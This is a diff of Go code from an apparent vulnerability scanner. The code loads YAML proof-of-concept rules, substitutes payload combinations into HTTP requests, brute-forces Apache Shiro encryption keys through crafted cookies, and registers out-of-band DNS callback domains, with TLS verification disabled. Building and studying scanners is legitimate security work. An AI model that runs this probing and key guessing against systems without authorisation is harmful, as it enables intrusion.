if err != nil {
|
||||
fmt.Println("[-] regexp.Compile error: ", err)
|
||||
return nil
|
||||
}
|
||||
result := r.FindStringSubmatch(body)
|
||||
names := r.SubexpNames()
|
||||
if len(result) > 1 && len(names) > 1 {
|
||||
paramsMap := make(map[string]string)
|
||||
for i, name := range names {
|
||||
if i > 0 && i <= len(result) {
|
||||
if strings.HasPrefix(re, "Set-Cookie:") && strings.Contains(name, "cookie") {
|
||||
paramsMap[name] = optimizeCookies(result[i])
|
||||
} else {
|
||||
paramsMap[name] = result[i]
|
||||
}
|
||||
}
|
||||
}
|
||||
return paramsMap
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func optimizeCookies(rawCookie string) (output string) {
|
||||
// Parse the cookies
|
||||
parsedCookie := strings.Split(rawCookie, "; ")
|
||||
for _, c := range parsedCookie {
|
||||
nameVal := strings.Split(c, "=")
|
||||
if len(nameVal) >= 2 {
|
||||
switch strings.ToLower(nameVal[0]) {
|
||||
case "expires", "max-age", "path", "domain", "version", "comment", "secure", "samesite", "httponly":
|
||||
continue
|
||||
}
|
||||
output += fmt.Sprintf("%s=%s; ", nameVal[0], strings.Join(nameVal[1:], "="))
|
||||
}
|
||||
}
|
||||
|
||||
return
|
||||
}
|
||||
|
||||
func newReverse() *Reverse {
|
||||
letters := "1234567890abcdefghijklmnopqrstuvwxyz"
|
||||
randSource := rand.New(rand.NewSource(time.Now().UnixNano()))
|
||||
sub := RandomStr(randSource, letters, 8)
|
||||
//if true {
|
||||
// //默认不开启dns解析
|
||||
// return &Reverse{}
|
||||
//}
|
||||
urlStr := fmt.Sprintf("http://%s.%s", sub, ceyeDomain)
|
||||
u, _ := url.Parse(urlStr)
|
||||
return &Reverse{
|
||||
Url: urlStr,
|
||||
Domain: u.Hostname(),
|
||||
Ip: u.Host,
|
||||
IsDomainNameServer: false,
|
||||
}
|
||||
}
|
||||
|
||||
func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{}, req *Request, env *cel.Env) (success bool, err error) {
|
||||
var strMap StrMap
|
||||
var tmpnum int
|
||||
for i, rule := range p.Rules {
|
||||
if !isFuzz(rule, p.Sets) {
|
||||
success, err = clustersend(oReq, variableMap, req, env, rule)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
if success {
|
||||
continue
|
||||
} else {
|
||||
return false, err
|
||||
}
|
||||
}
|
||||
setsMap := Combo(p.Sets)
|
||||
ruleHash := make(map[string]struct{})
|
||||
look:
|
||||
for j, item := range setsMap {
|
||||
//shiro默认只跑10key
|
||||
if p.Name == "poc-yaml-shiro-key" && !common.PocFull && j >= 10 {
|
||||
if item[1] == "cbc" {
|
||||
continue
|
||||
} else {
|
||||
if tmpnum == 0 {
|
||||
tmpnum = j
|
||||
}
|
||||
if j-tmpnum >= 10 {
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
rule1 := cloneRules(rule)
|
||||
var flag1 bool
|
||||
var tmpMap StrMap
|
||||
var payloads = make(map[string]interface{})
|
||||
var tmpexpression string
|
||||
for i, one := range p.Sets {
|
||||
key, expression := one.Key, item[i]
|
||||
if key == "payload" {
|
||||
tmpexpression = expression
|
||||
}
|
||||
_, output := evalset1(env, variableMap, key, expression)
|
||||
payloads[key] = output
|
||||
}
|
||||
for _, one := range p.Sets {
|
||||
flag := false
|
||||
key := one.Key
|
||||
value := fmt.Sprintf("%v", payloads[key])
|
||||
for k2, v2 := range rule1.Headers {
|
||||
if strings.Contains(v2, "{{"+key+"}}") {
|
||||
rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+key+"}}", value)
|
||||
flag = true
|
||||
}
|
||||
}
|
||||
if strings.Contains(rule1.Path, "{{"+key+"}}") {
|
||||
rule1.Path = strings.ReplaceAll(rule1.Path, "{{"+key+"}}", value)
|
||||
flag = true
|
||||
}
|
||||
if strings.Contains(rule1.Body, "{{"+key+"}}") {
|
||||
rule1.Body = strings.ReplaceAll(rule1.Body, "{{"+key+"}}", value)
|
||||
flag = true
|
||||
}
|
||||
if flag {
|
||||
flag1 = true
|
||||
if key == "payload" {
|
||||
var flag2 bool
|
||||
for k, v := range variableMap {
|
||||
if strings.Contains(tmpexpression, k) {
|
||||
flag2 = true
|
||||
tmpMap = append(tmpMap, StrItem{k, fmt.Sprintf("%v", v)})
|
||||
}
|
||||
}
|
||||
if flag2 {
|
||||
continue
|
||||
}
|
||||
}
|
||||
tmpMap = append(tmpMap, StrItem{key, value})
|
||||
}
|
||||
}
|
||||
if !flag1 {
|
||||
continue
|
||||
}
|
||||
has := md5.Sum([]byte(fmt.Sprintf("%v", rule1)))
|
||||
md5str := fmt.Sprintf("%x", has)
|
||||
if _, ok := ruleHash[md5str]; ok {
|
||||
continue
|
||||
}
|
||||
ruleHash[md5str] = struct{}{}
|
||||
success, err = clustersend(oReq, variableMap, req, env, rule1)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
if success {
|
||||
if rule.Continue {
|
||||
if p.Name == "poc-yaml-backup-file" || p.Name == "poc-yaml-sql-file" {
|
||||
common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name))
|
||||
} else {
|
||||
common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap))
|
||||
}
|
||||
continue
|
||||
}
|
||||
strMap = append(strMap, tmpMap...)
|
||||
if i == len(p.Rules)-1 {
|
||||
common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap))
|
||||
//防止后续继续打印poc成功信息
|
||||
return false, nil
|
||||
}
|
||||
break look
|
||||
}
|
||||
}
|
||||
if !success {
|
||||
break
|
||||
}
|
||||
if rule.Continue {
|
||||
//防止后续继续打印poc成功信息
|
||||
return false, nil
|
||||
}
|
||||
}
|
||||
return success, nil
|
||||
}
|
||||
|
||||
func isFuzz(rule Rules, Sets ListMap) bool {
|
||||
for _, one := range Sets {
|
||||
key := one.Key
|
||||
for _, v := range rule.Headers {
|
||||
if strings.Contains(v, "{{"+key+"}}") {
|
||||
return true
|
||||
}
|
||||
}
|
||||
if strings.Contains(rule.Path, "{{"+key+"}}") {
|
||||
return true
|
||||
}
|
||||
if strings.Contains(rule.Body, "{{"+key+"}}") {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func Combo(input ListMap) (output [][]string) {
|
||||
if len(input) > 1 {
|
||||
output = Combo(input[1:])
|
||||
output = MakeData(output, input[0].Value)
|
||||
} else {
|
||||
for _, i := range input[0].Value {
|
||||
output = append(output, []string{i})
|
||||
}
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
func MakeData(base [][]string, nextData []string) (output [][]string) {
|
||||
for i := range base {
|
||||
for _, j := range nextData {
|
||||
output = append(output, append([]string{j}, base[i]...))
|
||||
}
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
func clustersend(oReq *http.Request, variableMap map[string]interface{}, req *Request, env *cel.Env, rule Rules) (bool, error) {
|
||||
for k1, v1 := range variableMap {
|
||||
_, isMap := v1.(map[string]string)
|
||||
if isMap {
|
||||
continue
|
||||
}
|
||||
value := fmt.Sprintf("%v", v1)
|
||||
for k2, v2 := range rule.Headers {
|
||||
if strings.Contains(v2, "{{"+k1+"}}") {
|
||||
rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
|
||||
}
|
||||
}
|
||||
rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
|
||||
rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
|
||||
}
|
||||
if oReq.URL.Path != "" && oReq.URL.Path != "/" {
|
||||
req.Url.Path = fmt.Sprint(oReq.URL.Path, rule.Path)
|
||||
} else {
|
||||
req.Url.Path = rule.Path
|
||||
}
|
||||
// 某些poc没有区分path和query,需要处理
|
||||
req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
|
||||
//req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
|
||||
//
|
||||
newRequest, err := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
|
||||
if err != nil {
|
||||
//fmt.Println("[-] newRequest error:",err)
|
||||
return false, err
|
||||
}
|
||||
newRequest.Header = oReq.Header.Clone()
|
||||
for k, v := range rule.Headers {
|
||||
newRequest.Header.Set(k, v)
|
||||
}
|
||||
resp, err := DoRequest(newRequest, rule.FollowRedirects)
|
||||
newRequest = nil
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
variableMap["response"] = resp
|
||||
// 先判断响应页面是否匹配search规则
|
||||
if rule.Search != "" {
|
||||
result := doSearch(rule.Search, GetHeader(resp.Headers)+string(resp.Body))
|
||||
if result != nil && len(result) > 0 { // 正则匹配成功
|
||||
for k, v := range result {
|
||||
variableMap[k] = v
|
||||
}
|
||||
//return false, nil
|
||||
} else {
|
||||
return false, nil
|
||||
}
|
||||
}
|
||||
out, err := Evaluate(env, rule.Expression, variableMap)
|
||||
if err != nil {
|
||||
if strings.Contains(err.Error(), "Syntax error") {
|
||||
fmt.Println(rule.Expression, err)
|
||||
}
|
||||
return false, err
|
||||
}
|
||||
//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
|
||||
if fmt.Sprintf("%v", out) == "false" { //如果false不继续执行后续rule
|
||||
return false, err // 如果最后一步执行失败,就算前面成功了最终依旧是失败
|
||||
}
|
||||
return true, err
|
||||
}
|
||||
|
||||
func cloneRules(tags Rules) Rules {
|
||||
cloneTags := Rules{}
|
||||
cloneTags.Method = tags.Method
|
||||
cloneTags.Path = tags.Path
|
||||
cloneTags.Body = tags.Body
|
||||
cloneTags.Search = tags.Search
|
||||
cloneTags.FollowRedirects = tags.FollowRedirects
|
||||
cloneTags.Expression = tags.Expression
|
||||
cloneTags.Headers = cloneMap(tags.Headers)
|
||||
return cloneTags
|
||||
}
|
||||
|
||||
func cloneMap(tags map[string]string) map[string]string {
|
||||
cloneTags := make(map[string]string)
|
||||
for k, v := range tags {
|
||||
cloneTags[k] = v
|
||||
}
|
||||
return cloneTags
|
||||
}
|
||||
|
||||
func evalset(env *cel.Env, variableMap map[string]interface{}, k string, expression string) (err error, output string) {
|
||||
out, err := Evaluate(env, expression, variableMap)
|
||||
if err != nil {
|
||||
variableMap[k] = expression
|
||||
} else {
|
||||
switch value := out.Value().(type) {
|
||||
case *UrlType:
|
||||
variableMap[k] = UrlTypeToString(value)
|
||||
case int64:
|
||||
variableMap[k] = int(value)
|
||||
default:
|
||||
variableMap[k] = fmt.Sprintf("%v", out)
|
||||
}
|
||||
}
|
||||
return err, fmt.Sprintf("%v", variableMap[k])
|
||||
}
|
||||
|
||||
func evalset1(env *cel.Env, variableMap map[string]interface{}, k string, expression string) (err error, output string) {
|
||||
out, err := Evaluate(env, expression, variableMap)
|
||||
if err != nil {
|
||||
variableMap[k] = expression
|
||||
} else {
|
||||
variableMap[k] = fmt.Sprintf("%v", out)
|
||||
}
|
||||
return err, fmt.Sprintf("%v", variableMap[k])
|
||||
}
|
||||
|
||||
func CheckInfoPoc(infostr string) string {
|
||||
for _, poc := range info.PocDatas {
|
||||
if strings.Compare(poc.Name, infostr) == 0 {
|
||||
return poc.Alias
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func GetHeader(header map[string]string) (output string) {
|
||||
for name, values := range header {
|
||||
line := fmt.Sprintf("%s: %s\n", name, values)
|
||||
output = output + line
|
||||
}
|
||||
output = output + "\r\n"
|
||||
return
|
||||
}
|
|
@ -0,0 +1,255 @@
|
|||
package lib
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"embed"
|
||||
"errors"
|
||||
"fmt"
|
||||
"example.com/fxscan/common"
|
||||
"golang.org/x/net/proxy"
|
||||
"gopkg.in/yaml.v2"
|
||||
"io/ioutil"
|
||||
"log"
|
||||
"net"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
var (
|
||||
Client *http.Client
|
||||
ClientNoRedirect *http.Client
|
||||
dialTimout = 5 * time.Second
|
||||
keepAlive = 5 * time.Second
|
||||
)
|
||||
|
||||
func Inithttp(PocInfo common.PocInfo) {
|
||||
//PocInfo.Proxy = "http://127.0.0.1:8080"
|
||||
err := InitHttpClient(common.PocNum, common.Proxy, time.Duration(common.WebTimeout)*time.Second)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
}
|
||||
|
||||
func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) error {
|
||||
type DialContext = func(ctx context.Context, network, addr string) (net.Conn, error)
|
||||
dialer := &net.Dialer{
|
||||
Timeout: dialTimout,
|
||||
KeepAlive: keepAlive,
|
||||
}
|
||||
|
||||
tr := &http.Transport{
|
||||
DialContext: dialer.DialContext,
|
||||
MaxConnsPerHost: 5,
|
||||
MaxIdleConns: 0,
|
||||
MaxIdleConnsPerHost: ThreadsNum * 2,
|
||||
IdleConnTimeout: keepAlive,
|
||||
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
|
||||
TLSHandshakeTimeout: 5 * time.Second,
|
||||
DisableKeepAlives: false,
|
||||
}
|
||||
|
||||
if common.Socks5Proxy != "" {
|
||||
dialSocksProxy, err := common.Socks5Dailer(dialer)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if contextDialer, ok := dialSocksProxy.(proxy.ContextDialer); ok {
|
||||
tr.DialContext = contextDialer.DialContext
|
||||
} else {
|
||||
return errors.New("Failed type assertion to DialContext")
|
||||
}
|
||||
} else if DownProxy != "" {
|
||||
if DownProxy == "1" {
|
||||
DownProxy = "http://127.0.0.1:8080"
|
||||
} else if DownProxy == "2" {
|
||||
DownProxy = "socks5://127.0.0.1:1080"
|
||||
} else if !strings.Contains(DownProxy, "://") {
|
||||
DownProxy = "http://127.0.0.1:" + DownProxy
|
||||
}
|
||||
if !strings.HasPrefix(DownProxy, "socks") && !strings.HasPrefix(DownProxy, "http") {
|
||||
return errors.New("no support this proxy")
|
||||
}
|
||||
u, err := url.Parse(DownProxy)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
tr.Proxy = http.ProxyURL(u)
|
||||
}
|
||||
|
||||
Client = &http.Client{
|
||||
Transport: tr,
|
||||
Timeout: Timeout,
|
||||
}
|
||||
ClientNoRedirect = &http.Client{
|
||||
Transport: tr,
|
||||
Timeout: Timeout,
|
||||
CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse },
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
type Poc struct {
|
||||
Name string `yaml:"name"`
|
||||
Set StrMap `yaml:"set"`
|
||||
Sets ListMap `yaml:"sets"`
|
||||
Rules []Rules `yaml:"rules"`
|
||||
Groups RuleMap `yaml:"groups"`
|
||||
Detail Detail `yaml:"detail"`
|
||||
}
|
||||
|
||||
type MapSlice = yaml.MapSlice
|
||||
|
||||
type StrMap []StrItem
|
||||
type ListMap []ListItem
|
||||
type RuleMap []RuleItem
|
||||
|
||||
type StrItem struct {
|
||||
Key, Value string
|
||||
}
|
||||
|
||||
type ListItem struct {
|
||||
Key string
|
||||
Value []string
|
||||
}
|
||||
|
||||
type RuleItem struct {
|
||||
Key string
|
||||
Value []Rules
|
||||
}
|
||||
|
||||
func (r *StrMap) UnmarshalYAML(unmarshal func(interface{}) error) error {
|
||||
var tmp yaml.MapSlice
|
||||
if err := unmarshal(&tmp); err != nil {
|
||||
return err
|
||||
}
|
||||
for _, one := range tmp {
|
||||
key, value := one.Key.(string), one.Value.(string)
|
||||
*r = append(*r, StrItem{key, value})
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
//func (r *RuleItem) UnmarshalYAML(unmarshal func(interface{}) error) error {
|
||||
// var tmp yaml.MapSlice
|
||||
// if err := unmarshal(&tmp); err != nil {
|
||||
// return err
|
||||
// }
|
||||
// //for _,one := range tmp{
|
||||
// // key,value := one.Key.(string),one.Value.(string)
|
||||
// // *r = append(*r,StrItem{key,value})
|
||||
// //}
|
||||
// return nil
|
||||
//}
|
||||
|
||||
func (r *RuleMap) UnmarshalYAML(unmarshal func(interface{}) error) error {
|
||||
var tmp1 yaml.MapSlice
|
||||
if err := unmarshal(&tmp1); err != nil {
|
||||
return err
|
||||
}
|
||||
var tmp = make(map[string][]Rules)
|
||||
if err := unmarshal(&tmp); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
for _, one := range tmp1 {
|
||||
key := one.Key.(string)
|
||||
value := tmp[key]
|
||||
*r = append(*r, RuleItem{key, value})
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (r *ListMap) UnmarshalYAML(unmarshal func(interface{}) error) error {
|
||||
var tmp yaml.MapSlice
|
||||
if err := unmarshal(&tmp); err != nil {
|
||||
return err
|
||||
}
|
||||
for _, one := range tmp {
|
||||
key := one.Key.(string)
|
||||
var value []string
|
||||
for _, val := range one.Value.([]interface{}) {
|
||||
v := fmt.Sprintf("%v", val)
|
||||
value = append(value, v)
|
||||
}
|
||||
*r = append(*r, ListItem{key, value})
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
type Rules struct {
|
||||
Method string `yaml:"method"`
|
||||
Path string `yaml:"path"`
|
||||
Headers map[string]string `yaml:"headers"`
|
||||
Body string `yaml:"body"`
|
||||
Search string `yaml:"search"`
|
||||
FollowRedirects bool `yaml:"follow_redirects"`
|
||||
Expression string `yaml:"expression"`
|
||||
Continue bool `yaml:"continue"`
|
||||
}
|
||||
|
||||
type Detail struct {
|
||||
Author string `yaml:"author"`
|
||||
Links []string `yaml:"links"`
|
||||
Description string `yaml:"description"`
|
||||
Version string `yaml:"version"`
|
||||
}
|
||||
|
||||
func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
|
||||
var pocs []*Poc
|
||||
for _, f := range SelectPoc(Pocs, pocname) {
|
||||
if p, err := LoadPoc(f, Pocs); err == nil {
|
||||
pocs = append(pocs, p)
|
||||
} else {
|
||||
fmt.Println("[-] load poc ", f, " error:", err)
|
||||
}
|
||||
}
|
||||
return pocs
|
||||
}
|
||||
|
||||
func LoadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
|
||||
p := &Poc{}
|
||||
yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
|
||||
|
||||
if err != nil {
|
||||
fmt.Printf("[-] load poc %s error1: %v\n", fileName, err)
|
||||
return nil, err
|
||||
}
|
||||
err = yaml.Unmarshal(yamlFile, p)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] load poc %s error2: %v\n", fileName, err)
|
||||
return nil, err
|
||||
}
|
||||
return p, err
|
||||
}
|
||||
|
||||
func SelectPoc(Pocs embed.FS, pocname string) []string {
|
||||
entries, err := Pocs.ReadDir("pocs")
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
}
|
||||
var foundFiles []string
|
||||
for _, entry := range entries {
|
||||
if strings.Contains(entry.Name(), pocname) {
|
||||
foundFiles = append(foundFiles, entry.Name())
|
||||
}
|
||||
}
|
||||
return foundFiles
|
||||
}
|
||||
|
||||
func LoadPocbyPath(fileName string) (*Poc, error) {
|
||||
p := &Poc{}
|
||||
data, err := ioutil.ReadFile(fileName)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] load poc %s error3: %v\n", fileName, err)
|
||||
return nil, err
|
||||
}
|
||||
err = yaml.Unmarshal(data, p)
|
||||
if err != nil {
|
||||
fmt.Printf("[-] load poc %s error4: %v\n", fileName, err)
|
||||
return nil, err
|
||||
}
|
||||
return p, err
|
||||
}
|
|
@ -2,19 +2,25 @@ package lib
|
|||
|
||||
import (
|
||||
"bytes"
|
||||
"compress/gzip"
|
||||
"crypto/md5"
|
||||
"encoding/base64"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
"github.com/google/cel-go/cel"
|
||||
"github.com/google/cel-go/checker/decls"
|
||||
"github.com/google/cel-go/common/types"
|
||||
"github.com/google/cel-go/common/types/ref"
|
||||
"github.com/google/cel-go/interpreter/functions"
|
||||
"example.com/fxscan/common"
|
||||
exprpb "google.golang.org/genproto/googleapis/api/expr/v1alpha1"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"math/rand"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"regexp"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
@ -24,21 +30,24 @@ func NewEnv(c *CustomLib) (*cel.Env, error) {
|
|||
}
|
||||
|
||||
func Evaluate(env *cel.Env, expression string, params map[string]interface{}) (ref.Val, error) {
|
||||
if expression == "" {
|
||||
return types.Bool(true), nil
|
||||
}
|
||||
ast, iss := env.Compile(expression)
|
||||
if iss.Err() != nil {
|
||||
//fmt.Println("compile: ", iss.Err())
|
||||
//fmt.Printf("compile: ", iss.Err())
|
||||
return nil, iss.Err()
|
||||
}
|
||||
|
||||
prg, err := env.Program(ast)
|
||||
if err != nil {
|
||||
//fmt.Println("Program creation error: %v", err)
|
||||
//fmt.Printf("Program creation error: %v", err)
|
||||
return nil, err
|
||||
}
|
||||
|
||||
out, _, err := prg.Eval(params)
|
||||
if err != nil {
|
||||
//fmt.Println("Evaluation error: %v", err)
|
||||
//fmt.Printf("Evaluation error: %v", err)
|
||||
return nil, err
|
||||
}
|
||||
return out, nil
|
||||
|
@ -99,7 +108,7 @@ func NewEnvOption() CustomLib {
|
|||
cel.Declarations(
|
||||
decls.NewIdent("request", decls.NewObjectType("lib.Request"), nil),
|
||||
decls.NewIdent("response", decls.NewObjectType("lib.Response"), nil),
|
||||
//decls.NewIdent("reverse", decls.NewObjectType("lib.Reverse"), nil),
|
||||
decls.NewIdent("reverse", decls.NewObjectType("lib.Reverse"), nil),
|
||||
),
|
||||
cel.Declarations(
|
||||
// functions
|
||||
|
@ -123,6 +132,14 @@ func NewEnvOption() CustomLib {
|
|||
decls.NewOverload("randomLowercase_int",
|
||||
[]*exprpb.Type{decls.Int},
|
||||
decls.String)),
|
||||
decls.NewFunction("randomUppercase",
|
||||
decls.NewOverload("randomUppercase_int",
|
||||
[]*exprpb.Type{decls.Int},
|
||||
decls.String)),
|
||||
decls.NewFunction("randomString",
|
||||
decls.NewOverload("randomString_int",
|
||||
[]*exprpb.Type{decls.Int},
|
||||
decls.String)),
|
||||
decls.NewFunction("base64",
|
||||
decls.NewOverload("base64_string",
|
||||
[]*exprpb.Type{decls.String},
|
||||
|
@ -167,6 +184,26 @@ func NewEnvOption() CustomLib {
|
|||
decls.NewInstanceOverload("icontains_string",
|
||||
[]*exprpb.Type{decls.String, decls.String},
|
||||
decls.Bool)),
|
||||
decls.NewFunction("TDdate",
|
||||
decls.NewOverload("tongda_date",
|
||||
[]*exprpb.Type{},
|
||||
decls.String)),
|
||||
decls.NewFunction("shirokey",
|
||||
decls.NewOverload("shiro_key",
|
||||
[]*exprpb.Type{decls.String, decls.String},
|
||||
decls.String)),
|
||||
decls.NewFunction("startsWith",
|
||||
decls.NewInstanceOverload("startsWith_bytes",
|
||||
[]*exprpb.Type{decls.Bytes, decls.Bytes},
|
||||
decls.Bool)),
|
||||
decls.NewFunction("istartsWith",
|
||||
decls.NewInstanceOverload("startsWith_string",
|
||||
[]*exprpb.Type{decls.String, decls.String},
|
||||
decls.Bool)),
|
||||
decls.NewFunction("hexdecode",
|
||||
decls.NewInstanceOverload("hexdecode",
|
||||
[]*exprpb.Type{decls.String},
|
||||
decls.Bytes)),
|
||||
),
|
||||
}
|
||||
c.programOptions = []cel.ProgramOption{
|
||||
|
@ -186,7 +223,7 @@ func NewEnvOption() CustomLib {
|
|||
},
|
||||
},
|
||||
&functions.Overload{
|
||||
Operator: "string_bmatch_bytes",
|
||||
Operator: "string_bmatches_bytes",
|
||||
Binary: func(lhs ref.Val, rhs ref.Val) ref.Val {
|
||||
v1, ok := lhs.(types.String)
|
||||
if !ok {
|
||||
|
@ -238,6 +275,26 @@ func NewEnvOption() CustomLib {
|
|||
return types.String(randomLowercase(int(n)))
|
||||
},
|
||||
},
|
||||
&functions.Overload{
|
||||
Operator: "randomUppercase_int",
|
||||
Unary: func(value ref.Val) ref.Val {
|
||||
n, ok := value.(types.Int)
|
||||
if !ok {
|
||||
return types.ValOrErr(value, "unexpected type '%v' passed to randomUppercase", value.Type())
|
||||
}
|
||||
return types.String(randomUppercase(int(n)))
|
||||
},
|
||||
},
|
||||
&functions.Overload{
|
||||
Operator: "randomString_int",
|
||||
Unary: func(value ref.Val) ref.Val {
|
||||
n, ok := value.(types.Int)
|
||||
if !ok {
|
||||
return types.ValOrErr(value, "unexpected type '%v' passed to randomString", value.Type())
|
||||
}
|
||||
return types.String(randomString(int(n)))
|
||||
},
|
||||
},
|
||||
&functions.Overload{
|
||||
Operator: "base64_string",
|
||||
Unary: func(value ref.Val) ref.Val {
|
||||
|
@ -389,6 +446,75 @@ func NewEnvOption() CustomLib {
|
|||
return types.Bool(strings.Contains(strings.ToLower(string(v1)), strings.ToLower(string(v2))))
|
||||
},
|
||||
},
|
||||
&functions.Overload{
|
||||
Operator: "tongda_date",
|
||||
Function: func(value ...ref.Val) ref.Val {
|
||||
return types.String(time.Now().Format("0601"))
|
||||
},
|
||||
},
|
||||
&functions.Overload{
|
||||
Operator: "shiro_key",
|
||||
Binary: func(key ref.Val, mode ref.Val) ref.Val {
|
||||
v1, ok := key.(types.String)
|
||||
if !ok {
|
||||
return types.ValOrErr(key, "unexpected type '%v' passed to shiro_key", key.Type())
|
||||
}
|
||||
v2, ok := mode.(types.String)
|
||||
if !ok {
|
||||
return types.ValOrErr(mode, "unexpected type '%v' passed to shiro_mode", mode.Type())
|
||||
}
|
||||
cookie := GetShrioCookie(string(v1), string(v2))
|
||||
if cookie == "" {
|
||||
return types.NewErr("%v", "key b64decode failed")
|
||||
}
|
||||
return types.String(cookie)
|
||||
},
|
||||
},
|
||||
&functions.Overload{
|
||||
Operator: "startsWith_bytes",
|
||||
Binary: func(lhs ref.Val, rhs ref.Val) ref.Val {
|
||||
v1, ok := lhs.(types.Bytes)
|
||||
if !ok {
|
||||
return types.ValOrErr(lhs, "unexpected type '%v' passed to startsWith_bytes", lhs.Type())
|
||||
}
|
||||
v2, ok := rhs.(types.Bytes)
|
||||
if !ok {
|
||||
return types.ValOrErr(rhs, "unexpected type '%v' passed to startsWith_bytes", rhs.Type())
|
||||
}
|
||||
// 不区分大小写包含
|
||||
return types.Bool(bytes.HasPrefix(v1, v2))
|
||||
},
|
||||
},
|
||||
&functions.Overload{
|
||||
Operator: "startsWith_string",
|
||||
Binary: func(lhs ref.Val, rhs ref.Val) ref.Val {
|
||||
v1, ok := lhs.(types.String)
|
||||
if !ok {
|
||||
return types.ValOrErr(lhs, "unexpected type '%v' passed to startsWith_string", lhs.Type())
|
||||
}
|
||||
v2, ok := rhs.(types.String)
|
||||
if !ok {
|
||||
return types.ValOrErr(rhs, "unexpected type '%v' passed to startsWith_string", rhs.Type())
|
||||
}
|
||||
// 不区分大小写包含
|
||||
return types.Bool(strings.HasPrefix(strings.ToLower(string(v1)), strings.ToLower(string(v2))))
|
||||
},
|
||||
},
|
||||
&functions.Overload{
|
||||
Operator: "hexdecode",
|
||||
Unary: func(lhs ref.Val) ref.Val {
|
||||
v1, ok := lhs.(types.String)
|
||||
if !ok {
|
||||
return types.ValOrErr(lhs, "unexpected type '%v' passed to hexdecode", lhs.Type())
|
||||
}
|
||||
out, err := hex.DecodeString(string(v1))
|
||||
if err != nil {
|
||||
return types.ValOrErr(lhs, "hexdecode error: %v", err)
|
||||
}
|
||||
// 不区分大小写包含
|
||||
return types.Bytes(out)
|
||||
},
|
||||
},
|
||||
),
|
||||
}
|
||||
return c
|
||||
|
@ -403,8 +529,9 @@ func (c *CustomLib) ProgramOptions() []cel.ProgramOption {
|
|||
return c.programOptions
|
||||
}
|
||||
|
||||
func (c *CustomLib) UpdateCompileOptions(args map[string]string) {
|
||||
for k, v := range args {
|
||||
func (c *CustomLib) UpdateCompileOptions(args StrMap) {
|
||||
for _, item := range args {
|
||||
k, v := item.Key, item.Value
|
||||
// 在执行之前是不知道变量的类型的,所以统一声明为字符型
|
||||
// 所以randomInt虽然返回的是int型,在运算中却被当作字符型进行计算,需要重载string_*_string
|
||||
var d *exprpb.Decl
|
||||
|
@ -419,12 +546,23 @@ func (c *CustomLib) UpdateCompileOptions(args map[string]string) {
|
|||
}
|
||||
}
|
||||
|
||||
var randSource = rand.New(rand.NewSource(time.Now().Unix()))
|
||||
|
||||
func randomLowercase(n int) string {
|
||||
lowercase := "abcdefghijklmnopqrstuvwxyz"
|
||||
randSource := rand.New(rand.NewSource(time.Now().Unix()))
|
||||
return RandomStr(randSource, lowercase, n)
|
||||
}
|
||||
|
||||
func randomUppercase(n int) string {
|
||||
uppercase := "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
return RandomStr(randSource, uppercase, n)
|
||||
}
|
||||
|
||||
func randomString(n int) string {
|
||||
charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
|
||||
return RandomStr(randSource, charset, n)
|
||||
}
|
||||
|
||||
func reverseCheck(r *Reverse, timeout int64) bool {
|
||||
if ceyeApi == "" || r.Domain == "" {
|
||||
return false
|
||||
|
@ -432,7 +570,7 @@ func reverseCheck(r *Reverse, timeout int64) bool {
|
|||
time.Sleep(time.Second * time.Duration(timeout))
|
||||
sub := strings.Split(r.Domain, ".")[0]
|
||||
